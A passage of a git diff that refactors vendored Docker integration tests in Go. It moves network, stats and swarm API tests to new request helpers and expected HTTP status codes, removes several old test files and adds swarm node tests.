@@ -59,14 +61,25 @@ func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) {
 	}
 
 	// Creating a new network first
-	createNetwork(c, configOnCheck, true)
+	createNetwork(c, configOnCheck, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, name), checker.Equals, true)
 
 	// Creating another network with same name and CheckDuplicate must fail
-	createNetwork(c, configOnCheck, false)
+	isOlderAPI := versions.LessThan(testEnv.DaemonAPIVersion(), "1.34")
+	expectedStatus := http.StatusConflict
+	if isOlderAPI {
+		// In the early test code it uses bool value to represent
+		// whether createNetwork() is expected to fail or not.
+		// Therefore, we use negation to handle the same logic after
+		// the code was changed in https://github.com/moby/moby/pull/35030
+		// -http.StatusCreated will also be checked as NOT equal to
+		// http.StatusCreated in createNetwork() function.
+		expectedStatus = -http.StatusCreated
+	}
+	createNetwork(c, configOnCheck, expectedStatus)
 
 	// Creating another network with same name and not CheckDuplicate must succeed
-	createNetwork(c, configNotCheck, true)
+	createNetwork(c, configNotCheck, http.StatusCreated)
 }
 
 func (s *DockerSuite) TestAPINetworkFilter(c *check.C) {
@@ -75,7 +88,7 @@ func (s *DockerSuite) TestAPINetworkFilter(c *check.C) {
 	c.Assert(nr.Name, checker.Equals, "bridge")
 }
 
-func (s *DockerSuite) TestAPINetworkInspect(c *check.C) {
+func (s *DockerSuite) TestAPINetworkInspectBridge(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	// Inspect default bridge network
 	nr := getNetworkResource(c, "bridge")
@@ -93,13 +106,15 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) {
 	c.Assert(nr.Internal, checker.Equals, false)
 	c.Assert(nr.EnableIPv6, checker.Equals, false)
 	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
-	c.Assert(len(nr.Containers), checker.Equals, 1)
 	c.Assert(nr.Containers[containerID], checker.NotNil)
 
 	ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address)
 	c.Assert(err, checker.IsNil)
 	c.Assert(ip.String(), checker.Equals, containerIP)
+}
 
+func (s *DockerSuite) TestAPINetworkInspectUserDefinedNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux)
 	// IPAM configuration inspect
 	ipam := &network.IPAM{
 		Driver: "default",
@@ -113,10 +128,10 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) {
 			Options: map[string]string{"foo": "bar", "opts": "dopts"},
 		},
 	}
-	id0 := createNetwork(c, config, true)
+	id0 := createNetwork(c, config, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true)
 
-	nr = getNetworkResource(c, id0)
+	nr := getNetworkResource(c, id0)
 	c.Assert(len(nr.IPAM.Config), checker.Equals, 1)
 	c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16")
 	c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24")
@@ -136,7 +151,7 @@ func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) {
 	config := types.NetworkCreateRequest{
 		Name: name,
 	}
-	id := createNetwork(c, config, true)
+	id := createNetwork(c, config, http.StatusCreated)
 	nr := getNetworkResource(c, id)
 	c.Assert(nr.Name, checker.Equals, name)
 	c.Assert(nr.ID, checker.Equals, id)
@@ -184,7 +199,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) {
 			IPAM:   ipam0,
 		},
 	}
-	id0 := createNetwork(c, config0, true)
+	id0 := createNetwork(c, config0, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true)
 
 	ipam1 := &network.IPAM{
@@ -199,7 +214,11 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) {
 			IPAM:   ipam1,
 		},
 	}
-	createNetwork(c, config1, false)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		createNetwork(c, config1, http.StatusInternalServerError)
+	} else {
+		createNetwork(c, config1, http.StatusForbidden)
+	}
 	c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false)
 
 	ipam2 := &network.IPAM{
@@ -214,20 +233,20 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) {
 			IPAM:   ipam2,
 		},
 	}
-	createNetwork(c, config2, true)
+	createNetwork(c, config2, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true)
 
 	// remove test0 and retry to create test1
 	deleteNetwork(c, id0, true)
-	createNetwork(c, config1, true)
+	createNetwork(c, config1, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true)
 
 	// for networks w/o ipam specified, docker will choose proper non-overlapping subnets
-	createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true)
+	createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true)
-	createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true)
+	createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true)
-	createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, true)
+	createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, http.StatusCreated)
 	c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true)
 
 	for i := 1; i < 6; i++ {
@@ -236,7 +255,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) {
 }
 
 func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SwarmInactive)
 	createDeletePredefinedNetwork(c, "bridge")
 	createDeletePredefinedNetwork(c, "none")
 	createDeletePredefinedNetwork(c, "host")
@@ -250,18 +269,28 @@ func createDeletePredefinedNetwork(c *check.C, name string) {
 			CheckDuplicate: true,
 		},
 	}
-	shouldSucceed := false
-	createNetwork(c, config, shouldSucceed)
-	deleteNetwork(c, name, shouldSucceed)
+	expectedStatus := http.StatusForbidden
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.34") {
+		// In the early test code it uses bool value to represent
+		// whether createNetwork() is expected to fail or not.
+		// Therefore, we use negation to handle the same logic after
+		// the code was changed in https://github.com/moby/moby/pull/35030
+		// -http.StatusCreated will also be checked as NOT equal to
+		// http.StatusCreated in createNetwork() function.
+		expectedStatus = -http.StatusCreated
+	}
+	createNetwork(c, config, expectedStatus)
+	deleteNetwork(c, name, false)
 }
 
 func isNetworkAvailable(c *check.C, name string) bool {
-	status, body, err := sockRequest("GET", "/networks", nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	resp, body, err := request.Get("/networks")
 	c.Assert(err, checker.IsNil)
+	defer resp.Body.Close()
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 
-	nJSON := []types.NetworkResource{}
-	err = json.Unmarshal(body, &nJSON)
+	var nJSON []types.NetworkResource
+	err = json.NewDecoder(body).Decode(&nJSON)
 	c.Assert(err, checker.IsNil)
 
 	for _, n := range nJSON {
@@ -278,48 +307,59 @@ func getNetworkIDByName(c *check.C, name string) string {
 		filterArgs = filters.NewArgs()
 	)
 	filterArgs.Add("name", name)
-	filterJSON, err := filters.ToParam(filterArgs)
+	filterJSON, err := filters.ToJSON(filterArgs)
 	c.Assert(err, checker.IsNil)
 	v.Set("filters", filterJSON)
 
-	status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	resp, body, err := request.Get("/networks?" + v.Encode())
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 	c.Assert(err, checker.IsNil)
 
-	nJSON := []types.NetworkResource{}
-	err = json.Unmarshal(body, &nJSON)
+	var nJSON []types.NetworkResource
+	err = json.NewDecoder(body).Decode(&nJSON)
 	c.Assert(err, checker.IsNil)
-	c.Assert(len(nJSON), checker.Equals, 1)
+	var res string
+	for _, n := range nJSON {
+		// Find exact match
+		if n.Name == name {
+			res = n.ID
+		}
+	}
+	c.Assert(res, checker.Not(checker.Equals), "")
 
-	return nJSON[0].ID
+	return res
 }
 
 func getNetworkResource(c *check.C, id string) *types.NetworkResource {
-	_, obj, err := sockRequest("GET", "/networks/"+id, nil)
+	_, obj, err := request.Get("/networks/" + id)
 	c.Assert(err, checker.IsNil)
 
 	nr := types.NetworkResource{}
-	err = json.Unmarshal(obj, &nr)
+	err = json.NewDecoder(obj).Decode(&nr)
 	c.Assert(err, checker.IsNil)
 
 	return &nr
 }
 
-func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string {
-	status, resp, err := sockRequest("POST", "/networks/create", config)
-	if !shouldSucceed {
-		c.Assert(status, checker.Not(checker.Equals), http.StatusCreated)
-		return ""
-	}
-
+func createNetwork(c *check.C, config types.NetworkCreateRequest, expectedStatusCode int) string {
+	resp, body, err := request.Post("/networks/create", request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer resp.Body.Close()
 
-	var nr types.NetworkCreateResponse
-	err = json.Unmarshal(resp, &nr)
-	c.Assert(err, checker.IsNil)
+	if expectedStatusCode >= 0 {
+		c.Assert(resp.StatusCode, checker.Equals, expectedStatusCode)
+	} else {
+		c.Assert(resp.StatusCode, checker.Not(checker.Equals), -expectedStatusCode)
+	}
+
+	if expectedStatusCode == http.StatusCreated || expectedStatusCode < 0 {
+		var nr types.NetworkCreateResponse
+		err = json.NewDecoder(body).Decode(&nr)
+		c.Assert(err, checker.IsNil)
 
-	return nr.ID
+		return nr.ID
+	}
+	return ""
 }
 
 func connectNetwork(c *check.C, nid, cid string) {
@@ -327,8 +367,8 @@ func connectNetwork(c *check.C, nid, cid string) {
 		Container: cid,
 	}
 
-	status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	resp, _, err := request.Post("/networks/"+nid+"/connect", request.JSONBody(config))
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 	c.Assert(err, checker.IsNil)
 }
 
@@ -337,17 +377,18 @@ func disconnectNetwork(c *check.C, nid, cid string) {
 		Container: cid,
 	}
 
-	status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	resp, _, err := request.Post("/networks/"+nid+"/disconnect", request.JSONBody(config))
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 	c.Assert(err, checker.IsNil)
 }
 
 func deleteNetwork(c *check.C, id string, shouldSucceed bool) {
-	status, _, err := sockRequest("DELETE", "/networks/"+id, nil)
+	resp, _, err := request.Delete("/networks/" + id)
+	c.Assert(err, checker.IsNil)
+	defer resp.Body.Close()
 	if !shouldSucceed {
-		c.Assert(status, checker.Not(checker.Equals), http.StatusOK)
+		c.Assert(resp.StatusCode, checker.Not(checker.Equals), http.StatusOK)
 		return
 	}
-	c.Assert(status, checker.Equals, http.StatusNoContent)
-	c.Assert(err, checker.IsNil)
+	c.Assert(resp.StatusCode, checker.Equals, http.StatusNoContent)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
deleted file mode 100644
index daf1b05d2e..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go
+++ /dev/null
@@ -1,44 +0,0 @@
-package main
-
-import (
-	"net/http"
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestResizeAPIResponse(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
-	cleanedContainerID := strings.TrimSpace(out)
-
-	endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40"
-	status, _, err := sockRequest("POST", endpoint, nil)
-	c.Assert(status, check.Equals, http.StatusOK)
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) {
-	out, _ := runSleepingContainer(c, "-d")
-	cleanedContainerID := strings.TrimSpace(out)
-
-	endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar"
-	status, _, err := sockRequest("POST", endpoint, nil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	c.Assert(err, check.IsNil)
-}
-
-func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
-	cleanedContainerID := strings.TrimSpace(out)
-
-	// make sure the exited container is not running
-	dockerCmd(c, "wait", cleanedContainerID)
-
-	endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40"
-	status, body, err := sockRequest("POST", endpoint, nil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
-	c.Assert(err, check.IsNil)
-
-	c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'"))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
deleted file mode 100644
index 15a21e579f..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go
+++ /dev/null
@@ -1,39 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func setPortConfig(portConfig []swarm.PortConfig) serviceConstructor {
-	return func(s *swarm.Service) {
-		if s.Spec.EndpointSpec == nil {
-			s.Spec.EndpointSpec = &swarm.EndpointSpec{}
-		}
-		s.Spec.EndpointSpec.Ports = portConfig
-	}
-}
-
-func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	// Create a service with a port mapping of 8080:8081.
-	portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}}
-	serviceID := d.createService(c, simpleTestService, setInstances(1), setPortConfig(portConfig))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
-
-	// Update the service: changed the port mapping from 8080:8081 to 8082:8083.
-	updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}}
-	remoteService := d.getService(c, serviceID)
-	d.updateService(c, remoteService, setPortConfig(updatedPortConfig))
-
-	// Inspect the service and verify port mapping.
-	updatedService := d.getService(c, serviceID)
-	c.Assert(updatedService.Spec.EndpointSpec, check.NotNil)
-	c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1)
-	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083))
-	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
index 23fbdbb740..3954e4b2e0 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go
@@ -1,6 +1,7 @@
 package main
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"net/http"
@@ -13,19 +14,20 @@ import (
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
 var expectedNetworkInterfaceStats = strings.Split("rx_bytes rx_dropped rx_errors rx_packets tx_bytes tx_dropped tx_errors tx_packets", " ")
 
 func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done")
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;usleep 100; do echo 'Hello'; done")
 
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
-
-	resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+	resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id))
 	c.Assert(err, checker.IsNil)
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
 	c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
@@ -37,7 +39,7 @@ func (s *DockerSuite) TestAPIStatsNoStreamGetCpu(c *check.C) {
 
 	var cpuPercent = 0.0
 
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage)
 		systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage)
 		cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0
@@ -64,7 +66,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) {
 	id := strings.TrimSpace(out)
 
 	getGoRoutines := func() int {
-		_, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "")
+		_, body, err := request.Get(fmt.Sprintf("/info"))
 		c.Assert(err, checker.IsNil)
 		info := types.Info{}
 		err = json.NewDecoder(body).Decode(&info)
@@ -75,7 +77,7 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) {
 
 	// When the HTTP connection is closed, the number of goroutines should not increase.
 	routines := getGoRoutines()
-	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "")
+	_, body, err := request.Get(fmt.Sprintf("/containers/%s/stats", id))
 	c.Assert(err, checker.IsNil)
 	body.Close()
 
@@ -97,13 +99,13 @@ func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) {
 func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 
 	// Retrieve the container address
 	net := "bridge"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		net = "nat"
 	}
 	contIP := findContainerIP(c, id, net)
@@ -151,21 +153,21 @@ func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) {
 	// On Linux, account for ARP.
 	expRxPkts := preRxPackets + uint64(numPings)
 	expTxPkts := preTxPackets + uint64(numPings)
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		expRxPkts++
 		expTxPkts++
 	}
 	c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts,
 		check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts))
 	c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts,
-		check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts))
+		check.Commentf("Reported less RxPackets than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts))
 }
 
 func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) {
 	// Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 1.21
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 	wg := sync.WaitGroup{}
@@ -191,7 +193,7 @@ func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) {
 func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats {
 	var st *types.StatsJSON
 
-	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "")
+	_, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id))
 	c.Assert(err, checker.IsNil)
 
 	err = json.NewDecoder(body).Decode(&st)
@@ -208,7 +210,7 @@ func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats {
 func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} {
 	stats := make(map[string]interface{})
 
-	_, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "")
+	_, body, err := request.Get(fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id))
 	c.Assert(err, checker.IsNil)
 	defer body.Close()
 
@@ -260,30 +262,32 @@ func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool {
 
 func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-
-	status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
+	defer cli.Close()
 
-	status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
+	expected := "No such container: nonexistent"
+
+	_, err = cli.ContainerStats(context.Background(), "nonexistent", true)
+	c.Assert(err.Error(), checker.Contains, expected)
+	_, err = cli.ContainerStats(context.Background(), "nonexistent", false)
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
-	out1, _ := runSleepingContainer(c)
+	out1 := runSleepingContainer(c)
 	id1 := strings.TrimSpace(out1)
 	c.Assert(waitRun(id1), checker.IsNil)
 
-	out2, _ := runSleepingContainer(c, "--net", "container:"+id1)
+	out2 := runSleepingContainer(c, "--net", "container:"+id1)
 	id2 := strings.TrimSpace(out2)
 	c.Assert(waitRun(id2), checker.IsNil)
 
-	ch := make(chan error)
+	ch := make(chan error, 1)
 	go func() {
-		resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "")
+		resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id2))
 		defer body.Close()
 		if err != nil {
 			ch <- err
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
deleted file mode 100644
index 0995ce3833..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go
+++ /dev/null
@@ -1,41 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"encoding/json"
-	"fmt"
-	"net/http"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) {
-	testRequires(c, DaemonIsLinux, memoryLimitSupport)
-
-	resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json")
-	c.Assert(err, checker.IsNil)
-	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
-	var info types.Info
-	err = json.NewDecoder(body).Decode(&info)
-	c.Assert(err, checker.IsNil)
-	body.Close()
-
-	// don't set a memory limit, the memory limit should be system memory
-	conName := "foo"
-	dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top")
-	c.Assert(waitRun(conName), checker.IsNil)
-
-	resp, body, err = sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "")
-	c.Assert(err, checker.IsNil)
-	c.Assert(resp.StatusCode, checker.Equals, http.StatusOK)
-	c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json")
-
-	var v *types.Stats
-	err = json.NewDecoder(body).Decode(&v)
-	c.Assert(err, checker.IsNil)
-	body.Close()
-	c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go
new file mode 100644
index 0000000000..191391620d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go
@@ -0,0 +1,127 @@
+// +build !windows
+
+package main
+
+import (
+	"time"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	nodes := d1.ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
+
+loop0:
+	for _, n := range nodes {
+		for _, d := range []*daemon.Daemon{d1, d2, d3} {
+			if n.ID == d.NodeID() {
+				continue loop0
+			}
+		}
+		c.Errorf("unknown nodeID %v", n.ID)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	nodes := d.ListNodes(c)
+
+	d.UpdateNode(c, nodes[0].ID, func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityPause
+	})
+
+	n := d.GetNode(c, nodes[0].ID)
+	c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) {
+	testRequires(c, Network)
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	_ = s.AddDaemon(c, true, false)
+
+	nodes := d1.ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
+
+	// Getting the info so we can take the NodeID
+	d2Info := d2.SwarmInfo(c)
+
+	// forceful removal of d2 should work
+	d1.RemoveNode(c, d2Info.NodeID, true)
+
+	nodes = d1.ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
+
+	// Restart the node that was removed
+	d2.Restart(c)
+
+	// Give some time for the node to rejoin
+	time.Sleep(1 * time.Second)
+
+	// Make sure the node didn't rejoin
+	nodes = d1.ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
+
+	// start a service, expect balanced distribution
+	instances := 8
+	id := d1.CreateService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances)
+
+	// drain d2, all containers should move to d1
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityDrain
+	})
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0)
+
+	// set d2 back to active
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityActive
+	})
+
+	instances = 1
+	d1.UpdateService(c, d1.GetService(c, id), setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances)
+
+	instances = 8
+	d1.UpdateService(c, d1.GetService(c, id), setInstances(instances))
+
+	// drained node first so we don't get any old containers
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances)
+
+	d2ContainerCount := len(d2.ActiveContainers(c))
+
+	// set d2 to paused, scale service up, only d1 gets new tasks
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
+		n.Spec.Availability = swarm.NodeAvailabilityPause
+	})
+
+	instances = 14
+	d1.UpdateService(c, d1.GetService(c, id), setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances-d2ContainerCount)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, d2ContainerCount)
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go
new file mode 100644
index 0000000000..1a826c99c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go
@@ -0,0 +1,612 @@
+// +build !windows
+
+package main
+
+import (
